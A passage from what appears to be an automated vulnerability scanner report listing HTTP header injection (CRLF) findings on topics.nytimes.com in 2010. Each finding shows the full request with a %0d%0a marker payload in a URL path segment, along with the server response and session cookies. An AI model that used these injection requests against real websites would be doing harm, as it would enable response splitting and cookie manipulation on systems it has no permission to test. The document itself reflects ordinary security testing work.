User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/8a68b
66ffcb46ee5
/oped/columnists/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.58. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/columnists/paulkrugman/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5d2b0%0d%0aa613315c88b was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/5d2b0%0d%0aa613315c88b/columnists/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/5d2b0
a613315c88b
/columnists/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.59. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/columnists/paulkrugman/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 9110f%0d%0af9cc7c13367 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/oped/9110f%0d%0af9cc7c13367/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/9110f
f9cc7c13367
/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.60. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/columnists/paulkrugman/

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload ca88e%0d%0a95b10fb38c5 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/oped/columnists/ca88e%0d%0a95b10fb38c5/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ca88e
95b10fb38c5
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.61. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/contributors/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload eb712%0d%0a0beb5e0feca was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/eb712%0d%0a0beb5e0feca/editorialsandoped/oped/contributors/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:26 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/eb712
0beb5e0feca
/editorialsandoped/oped/contributors/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.62. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/contributors/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5f651%0d%0a988d28d4d19 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/5f651%0d%0a988d28d4d19/oped/contributors/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:26 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/5f651
988d28d4d19
/oped/contributors/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.63. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/contributors/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3c52f%0d%0a74ac431d19e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/3c52f%0d%0a74ac431d19e/contributors/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:26 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/3c52f
74ac431d19e
/contributors/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.64. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/contributors/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload fc78e%0d%0aad7fb1cd36 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/oped/fc78e%0d%0aad7fb1cd36/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:26 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/fc78e
ad7fb1cd36
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.65. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a3d8a%0d%0afeeb0597b5c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/a3d8a%0d%0afeeb0597b5c/timestopics/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:40:48 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/a3d8a
feeb0597b5c
/timestopics/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.66. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 1ba27%0d%0a30fc9b65d99 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/reference/1ba27%0d%0a30fc9b65d99/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:40:48 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/1ba27
30fc9b65d99
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.67. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/organizations/p/park51/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 12c7d%0d%0ad02959b441 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/12c7d%0d%0ad02959b441/timestopics/organizations/p/park51/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:33 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/12c7d
d02959b441
/timestopics/organizations/p/park51/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.68. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/organizations/p/park51/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 9a0c4%0d%0a26bcdaf529 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/reference/9a0c4%0d%0a26bcdaf529/organizations/p/park51/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:33 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/9a0c4
26bcdaf529
/organizations/p/park51/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.69. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/organizations/p/park51/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 2d70a%0d%0a0b18576cfa6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/2d70a%0d%0a0b18576cfa6/p/park51/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:33 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/2d70a
0b18576cfa6
/p/park51/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.70. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/organizations/p/park51/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload ca929%0d%0a23e3cdede98 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/organizations/ca929%0d%0a23e3cdede98/park51/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:33 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/organizations/ca929
23e3cdede98
/park51/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.71. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/organizations/p/park51/

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 6e96e%0d%0a3e5641ba8fc was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/organizations/p/6e96e%0d%0a3e5641ba8fc/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:34 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/organizations/p/6e96e
3e5641ba8fc
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.72. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/people/m/madonna/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9c59a%0d%0a76e21e137a4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/9c59a%0d%0a76e21e137a4/timestopics/people/m/madonna/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
